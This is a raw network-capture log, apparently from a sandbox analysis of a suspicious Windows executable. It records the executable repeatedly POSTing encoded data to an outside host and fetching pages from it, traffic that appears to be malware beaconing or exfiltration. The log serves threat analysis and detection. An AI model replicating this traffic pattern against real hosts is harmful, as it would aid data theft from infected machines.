Nov 11, 2024 08:31:58.348066092 CET	405	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 07:31:58 GMT Content-Type: text/html Content-Length: 265 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 52 55 30 65 3d 6a 58 46 54 30 34 46 68 76 42 5a 38 6a 30 42 50 26 49 72 38 48 55 6a 3d 54 67 44 4f 44 41 49 4a 61 4f 6c 35 6a 74 54 34 4a 52 66 49 39 4f 50 77 42 4b 6c 55 6d 46 62 61 46 69 6c 51 2b 4d 6a 4d 65 32 64 33 53 30 47 50 34 46 4d 56 73 4f 76 64 75 79 37 4e 4a 34 2b 4e 65 54 77 59 76 54 71 54 68 64 58 52 50 33 56 33 6d 4e 38 70 6b 70 30 78 38 33 31 7a 6f 68 47 66 71 44 69 43 64 4a 52 63 68 43 55 51 31 6e 70 75 71 75 72 77 75 43 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49817	194.58.112.174	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:03.874814034 CET	802	OUT	POST /xprp/ HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.marketplacer.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.marketplacer.top/xprp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 39 76 76 45 57 72 4f 49 49 54 57 30 48 41 6c 47 41 78 73 32 61 6c 4d 41 56 59 6f 34 4b 71 7a 52 68 4b 49 54 55 5a 2b 33 76 43 51 6d 63 65 4f 46 7a 35 73 67 4f 43 61 64 77 49 73 31 78 5a 32 64 37 4f 45 45 5a 48 67 76 76 59 58 46 64 6a 65 77 44 39 77 6e 59 45 67 66 73 65 67 2b 76 2b 31 30 6f 6e 6f 52 70 4a 4c 32 46 4e 68 52 4c 2f 47 34 4a 41 34 4c 42 4c 64 35 49 39 39 65 48 44 4e 77 71 51 73 32 70 76 32 75 51 59 32 79 75 53 52 68 43 2f 46 53 52 33 76 51 2f 74 76 54 71 4f 46 4f 75 69 77 59 76 66 4a 30 47 71 6a 79 71 32 54 4c 7a 39 64 77 70 51 3d 3d Data Ascii: Ir8HUj=Yv4rZANXzXyi9vvEWrOIITW0HAlGAxs2alMAVYo4KqzRhKITUZ+3vCQmceOFz5sgOCadwIs1xZ2d7OEEZHgvvYXFdjewD9wnYEgfseg+v+10onoRpJL2FNhRL/G4JA4LBLd5I99eHDNwqQs2pv2uQY2yuSRhC/FSR3vQ/tvTqOFOuiwYvfJ0Gqjyq2TLz9dwpQ==
Nov 11, 2024 08:32:04.467914104 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:32:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED] Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$\|thTB%;@i)b/:gj2{A$0@HuAlOHzktjBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^\|gS^wmIeG4(pSBRa"\|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#\|N>C%w}z\|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 \|\JzPAY'/4;@L>M&Mn~e(ab8$&n"tR\,}oCQMRA [TRUNCATED]
Nov 11, 2024 08:32:04.467931032 CET	212	IN	Data Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6
Nov 11, 2024 08:32:04.467947960 CET	1236	IN	Data Raw: 76 f1 3d aa 72 7f 92 05 cf b9 e7 a4 85 fe 7b f2 09 56 74 90 3c 80 6e 87 58 08 16 31 b9 2d a8 c0 49 1b 50 f2 70 60 a6 0f 28 7b d2 82 0f f0 ff 01 ad 31 4b ab b0 c0 e4 33 b6 02 c7 32 ac 94 7c 0f b3 a0 ef 4f bf de 7f 61 6e f2 06 83 f1 a4 d5 fe 69 f2 Data Ascii: v=r{Vt<nX1-IPp`({1K32\|Oanie{tLB#tP.g74TE0>$h_X3,%0BJ 0lElr`Fs]y:4{B,sjr`.viuqH[-9G8+3
Nov 11, 2024 08:32:04.467958927 CET	858	IN	Data Raw: 29 45 46 5e a7 51 16 67 0d 10 8c f3 8e af 60 6f 46 7e c1 f7 85 8f e4 99 34 58 0a ee 75 23 9c 10 a9 b7 7c 45 ce ae 94 4d 87 72 c1 bd 34 8c 8e e5 a0 74 61 18 6e 52 d2 31 f1 1b e3 4b b2 fb 2e 2e 47 2b 65 ea 57 ae 6e be b4 35 d5 d0 08 b4 71 ff 86 e1 Data Ascii: )EF^Qg`oF~4Xu#\|EMr4tanR1K..G+eWn5qlgM8m~=<=y3{6}*U^u}dW/F2TWR;fn%W6c7Mky9yUs%,]YYN3fzRReG&cZaY&S\|\VLUD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49841	194.58.112.174	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:06.416846037 CET	822	OUT	POST /xprp/ HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.marketplacer.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.marketplacer.top/xprp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 38 50 66 45 51 49 6d 49 44 54 57 31 43 41 6c 47 4f 68 73 79 61 6c 51 41 56 5a 38 6f 4b 34 58 52 68 75 4d 54 56 59 2b 33 71 43 51 6d 45 75 4f 45 75 4a 73 37 4f 43 58 71 77 49 67 31 78 61 4b 64 37 4c 34 45 59 31 49 6f 75 49 58 39 56 44 65 49 4d 64 77 6e 59 45 67 66 73 61 77 41 76 2b 74 30 6f 54 73 52 72 6f 4c 35 47 4e 68 53 43 66 47 34 65 77 34 50 42 4c 64 62 49 2f 4a 30 48 47 42 77 71 55 6f 32 75 39 65 78 5a 59 32 30 67 79 51 70 52 73 38 57 63 47 50 5a 79 39 44 66 71 63 46 64 6d 45 39 43 2b 75 6f 6a 55 71 48 42 33 78 61 2f 2b 2b 67 35 79 59 41 51 78 47 37 39 6c 57 32 55 5a 53 66 39 53 53 31 7a 43 41 55 3d Data Ascii: Ir8HUj=Yv4rZANXzXyi8PfEQImIDTW1CAlGOhsyalQAVZ8oK4XRhuMTVY+3qCQmEuOEuJs7OCXqwIg1xaKd7L4EY1IouIX9VDeIMdwnYEgfsawAv+t0oTsRroL5GNhSCfG4ew4PBLdbI/J0HGBwqUo2u9exZY20gyQpRs8WcGPZy9DfqcFdmE9C+uojUqHB3xa/++g5yYAQxG79lW2UZSf9SS1zCAU=
Nov 11, 2024 08:32:07.050313950 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:32:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED] Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$\|thTB%;@i)b/:gj2{A$0@HuAlOHzktjBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^\|gS^wmIeG4(pSBRa"\|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#\|N>C%w}z\|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 \|\JzPAY'/4;@L>M&Mn~e(ab8$&n"tR\,}oCQMRA [TRUNCATED]
Nov 11, 2024 08:32:07.050333023 CET	1236	IN	Data Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
Nov 11, 2024 08:32:07.050344944 CET	424	IN	Data Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8 Data Ascii: /l)/,/z~}z]@BN-mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#
Nov 11, 2024 08:32:07.050357103 CET	646	IN	Data Raw: 5a f4 0d 61 59 9b 01 82 26 9b 53 8e 7c d3 5c 56 97 85 17 4c 55 e1 bb c3 f5 b9 0e 17 44 d9 0b 70 75 76 09 a3 60 b4 5c 1c a9 66 fc 41 ae 2e 42 81 ab ae 7c cd 15 5a f4 f5 cd 97 ac f3 5b 55 fb ec 07 36 7f af 6e 7e f8 41 bc 75 16 b6 60 6c e4 42 0d 2b Data Ascii: ZaY&S\|\VLUDpuv`\fA.B\|Z[U6n~Au`lB+K'IplZ,}/i# 7Zeq#wElBPj!WhW%' 7HBQhEd}l-G'f,3@4P_JOR1f-S_]7G!ih,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49860	194.58.112.174	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:08.962441921 CET	10904	OUT	POST /xprp/ HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.marketplacer.top Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.marketplacer.top/xprp/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 59 76 34 72 5a 41 4e 58 7a 58 79 69 38 50 66 45 51 49 6d 49 44 54 57 31 43 41 6c 47 4f 68 73 79 61 6c 51 41 56 5a 38 6f 4b 34 66 52 67 62 59 54 61 62 6d 33 74 43 51 6d 61 65 4f 42 75 4a 74 68 4f 43 50 6d 77 4a 63 6c 78 66 47 64 71 64 73 45 66 45 49 6f 67 49 58 39 5a 6a 65 7a 44 39 78 6c 59 45 77 68 73 65 55 41 76 2b 74 30 6f 53 63 52 76 35 4c 35 41 4e 68 52 4c 2f 47 4f 4a 41 34 7a 42 4c 46 68 49 38 6c 4f 41 79 39 77 72 30 34 32 6f 49 43 78 57 59 32 32 6a 79 51 59 52 74 41 5a 63 47 43 67 79 39 47 77 71 65 5a 64 6b 56 67 74 68 76 77 41 50 4a 61 63 67 54 65 2f 2b 2f 39 34 35 6f 51 78 68 46 43 6e 7a 6e 57 4e 55 68 6a 7a 57 67 68 35 47 46 6f 36 67 2b 62 6d 68 6e 52 2b 61 6e 75 58 72 66 6d 70 77 34 65 75 35 4f 39 6a 49 50 34 35 68 46 46 33 6f 6a 33 62 5a 6a 77 4a 66 77 37 32 72 4c 73 52 68 31 6c 37 6f 4f 68 64 68 48 4d 4c 6b 6f 6d 39 7a 4d 6c 73 4a 62 6c 46 49 67 30 56 56 68 37 70 39 4c 66 4e 76 45 54 6a 34 53 75 32 6f 73 65 54 4d 55 56 66 71 34 4c 38 44 31 76 6b 57 6c 68 55 7a 73 6a [TRUNCATED] Data Ascii: Ir8HUj=Yv4rZANXzXyi8PfEQImIDTW1CAlGOhsyalQAVZ8oK4fRgbYTabm3tCQmaeOBuJthOCPmwJclxfGdqdsEfEIogIX9ZjezD9xlYEwhseUAv+t0oScRv5L5ANhRL/GOJA4zBLFhI8lOAy9wr042oICxWY22jyQYRtAZcGCgy9GwqeZdkVgthvwAPJacgTe/+/945oQxhFCnznWNUhjzWgh5GFo6g+bmhnR+anuXrfmpw4eu5O9jIP45hFF3oj3bZjwJfw72rLsRh1l7oOhdhHMLkom9zMlsJblFIg0VVh7p9LfNvETj4Su2oseTMUVfq4L8D1vkWlhUzsjY2UELXW6IedKjMdKo+/5YZOyCbYRCPdVnwEUDdVaMaUDtw/EWoSYnPTqI9F57FJbIQ+D7PquWDS+C+uCf9tjzLHQkL5o3O0SVu9qMc2PJKg140145wL6PA6veqjlvq1gB68FADEQ6qBqwOHiqhdOyEyUdgdzLSYcV6lyxdXXkrXvV8Ptri6EdT193CMbZFUqvc1WnuG/J9/tcRxr4SPz6hqrPyGXdQtfVvNCQ/crLXDHxIPGTwpQc9RR1r7/iR8nA9wztnxU6CqLVxDvHlLMWgqIv3OkKn8kg4AjdYxWgDBwLpdYiJxXI033/xStqOTiXwlojplK7c0H6EsvgFxie8yAVgRD/l9wyFvIbUrfBwgLstd3y+1RHnO+tBxxGOW0lEPWPEkUfTCQWLeyZFTlwzMmPYe2yuwag8ToIM6oULSlJByQBvYmPwkkCbWgtt4YsQP/ioGhgZEXz4Kx6+Bvd4LwRe2bI0HdTeGkB9xMaHh+dyL9ejnE/1qf01SRHdmnUTbVVsM/XF3MllAN0/dMpEAD3XRW02RBFok0ED/aSppub1Ehfi0g+VIuhKovflM9ob7PK1ucmLwGjmAE6ayXWy1xNwlYST2kvYnTzBnqg+Ls0OKTeI/66ccItXUdNKoyNod/1ATBMqk4glYCMO4thAkAFxhQTHnqvu [TRUNCATED]
Nov 11, 2024 08:32:09.590374947 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:32:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b [TRUNCATED] Data Ascii: d1cZko_1fQRERy8G9-E!rJm4bh@/T@~QP;%E8EH"ggslt'txDOfq(yqKvP{;$\|thTB%;@i)b/:gj2{A$0@HuAlOHzktjBs)="[c}/HR{JaxQ_HmrvSL{XF{[B0g}$~0@vszFP73o^\|gS^wmIeG4(pSBRa"\|tomkr\_EQ=X8r x%HoY/GZAEc;mk_Ekh6Sm^jHLb,j&oQr<w#\|N>C%w}z\|w%h:m"fXi=/8F`]P%8ZT<KAj#P4=hrf:tUFBS8[N^kk=uV:?iuj9XL%[mvA1B}UoG+}p3&.[v{uChi>~pjZ@~iv8 b(;rGmB/vr'E"5i(rU#S5I!$z)p3utrjYAB9 \|\JzPAY'/4;@L>M&Mn~e(ab8$&n"tR\,}oCQMRA [TRUNCATED]
Nov 11, 2024 08:32:09.590389013 CET	1236	IN	Data Raw: a0 d3 8f f4 7d 3a eb d4 fd 05 82 f5 2d d4 55 5d 2f 68 f9 6a 5b 5b 26 b6 31 a1 8e c2 a0 fb 64 a7 80 8d 01 77 97 92 d9 3f 81 5e 64 2e 98 f7 71 72 0f 38 63 09 33 3c 3b 1f bc c6 38 f1 a8 6d 5c 9e 6b d2 0e c1 78 03 e4 ca 40 41 ee 9f 91 01 ef 4f 7e 8f Data Ascii: }:-U]/hj[[&1dw?^d.qr8c3<;8m\kx@AO~y<2^zgI\w@)9s@JQL7]]<d%f8> `pr`Ln-Y`.O1`e!U@/rbaa6v=r{Vt<nX1-
Nov 11, 2024 08:32:09.590400934 CET	1070	IN	Data Raw: 13 2f 11 d2 0d 6c e1 2a e4 29 2f 13 16 0e 2c 1c da 2f 7a 7e d2 c1 7d 7a f9 91 5d 8d 40 f1 8e d4 b2 42 7f aa d7 4e 89 c2 8f b7 2d 2a 82 da 6d be ef c0 51 27 0e 27 ab 62 b6 13 f5 8f 14 f6 f8 c1 da cc e0 bd 53 33 5f a7 b2 70 54 da f2 3a 0b e5 ec c8 Data Ascii: /l)/,/z~}z]@BN-mQ''bS3_pT:Hb\8;RxC0z+,:;iFdx8WAWr"i4+obMX6_yoR^/WEBMgn4o9++=X-0.=yY/>#)EF^Qg`oF~4Xu#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49881	194.58.112.174	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:11.504558086 CET	537	OUT	GET /xprp/?Ir8HUj=VtQLa3osnF7akoTJd8K7MWrEHzl8DW0FSH4Ha68GLubc/osER9eyiC9/VfKiy/o0cRDnmrVyyY747d0hGVpIr6r2fBWTDvY7eHgrrdp64c4dmhIDxYLLQeM=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.marketplacer.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:32:12.133975029 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:32:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 [TRUNCATED] Data Ascii: 24fc<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.marketplacer.top</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/<![CDATA[/window.trackScriptLoad = function(){};/.../</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text">  <a class="b-link" href="https://reg. [TRUNCATED]
Nov 11, 2024 08:32:12.134052992 CET	1236	IN	Data Raw: 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f Data Ascii: v><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.marketplacer.top</h1><p class="b-parking__he
Nov 11, 2024 08:32:12.134078979 CET	1236	IN	Data Raw: d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_typ
